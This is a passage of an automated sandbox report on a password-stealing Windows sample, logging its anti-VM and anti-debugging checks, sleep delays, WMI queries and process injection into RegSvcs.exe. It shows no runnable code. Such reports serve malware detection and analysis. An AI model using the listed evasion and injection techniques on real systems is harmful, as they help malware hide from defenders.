                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595155Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595046Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7943Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1897Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe TID: 7276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599226Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99780Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99672Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98906Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98797Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597777Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595155Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595046Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594609Jump to behavior
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                        Source: RegSvcs.exe, 00000002.00000002.4141211238.0000000005DBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

                        Anti Debugging

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00E57EC8 CheckRemoteDebuggerPresent,2_2_00E57EC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 935008Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
